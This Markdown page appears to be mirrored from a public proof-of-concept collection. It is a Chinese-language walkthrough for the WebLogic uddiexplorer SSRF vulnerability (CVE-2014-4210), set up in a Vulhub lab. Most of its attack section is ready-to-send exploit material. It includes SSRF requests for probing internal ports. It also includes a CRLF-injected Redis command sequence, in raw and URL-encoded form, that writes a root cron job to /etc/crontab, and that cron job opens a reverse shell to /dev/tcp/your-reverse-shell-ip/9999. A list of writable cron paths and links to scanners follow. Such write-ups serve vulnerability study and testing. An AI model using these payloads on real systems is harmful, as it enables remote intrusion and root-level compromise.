admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Weblogic uddiexplorer SSRF漏洞 CVE-2014-4210.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

108 lines
4.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Weblogic uddiexplorer SSRF漏洞 CVE-2014-4210
## 漏洞描述
Weblogic中存在一个SSRF漏洞利用该漏洞可以发送任意HTTP请求进而攻击内网中redis、fastcgi等脆弱组件。
## 漏洞影响
```
Oracle WebLogic Server 10.0.2.0
Oracle WebLogic Server 10.3.6.0
```
## 环境搭建
Vulhub编译及启动测试环境
```
docker-compose up -d
```
访问`http://your-ip:7001/uddiexplorer/`无需登录即可查看uddiexplorer应用。
![image-20220302210736666](images/202203022107741.png)
## 漏洞复现
SSRF漏洞存在于`http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`我们在burpsuite下测试该漏洞。访问一个可以访问的IP:PORT`http://127.0.0.1:80`
```
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: your-vps-ip:7001
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
可访问的端口将会得到错误一般是返回status code如下图如果访问的非http协议则会返回`did not have a valid SOAP content-type`
![image-20220302211012943](images/202203022110046.png)
修改为一个不存在的端口,将会返回`could not connect over HTTP to server`
![image-20220302211141064](images/202203022111161.png)
通过错误的不同,即可探测内网状态。
### 反弹shell
Weblogic的SSRF有一个比较大的特点其虽然是一个“GET”请求但是我们可以通过传入`%0a%0d`来注入换行符而某些服务如redis是通过换行符来分隔每条命令也就说我们可以通过该SSRF攻击内网中的redis服务器。
> 此处kali启动redis失败转为CentOS vps进行复现。
首先通过ssrf探测内网中的redis服务器docker环境的网段一般是172.*),发现`172.18.0.2:6379`可以连通:
![image-20220302220543308](images/202203022205403.png)
发送三条redis命令将弹shell脚本写入`/etc/crontab`
```
test
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/your-reverse-shell-ip/9999 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa
```
进行url编码
```
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fyour-reverse-shell-ip%2F9999%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
```
注意,换行符是“\r\n”也就是“%0D%0A”。
将url编码后的字符串放在ssrf的域名后面发送
```
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fyour-reverse-shell-ip%2F9999%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: your-vps-ip:7001
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
成功反弹:
![image-20220302220843300](images/202203022208358.png)
最后补充一下可进行利用的cron有如下几个地方
- /etc/crontab 这个是肯定的
- /etc/cron.d/* 将任意文件写到该目录下效果和crontab相同格式也要和/etc/crontab相同。漏洞利用这个目录可以做到不覆盖任何其他文件的情况进行弹shell。
- /var/spool/cron/root是centos系统下root用户的cron文件
- /var/spool/cron/crontabs/root是debian系统下root用户的cron文件
## 开源POC
- https://github.com/0xn0ne/weblogicScanner
- https://github.com/rabbitmask/WeblogicScan
- https://github.com/dr0op/WeblogicScan
Reference in New Issue View Git Blame Copy Permalink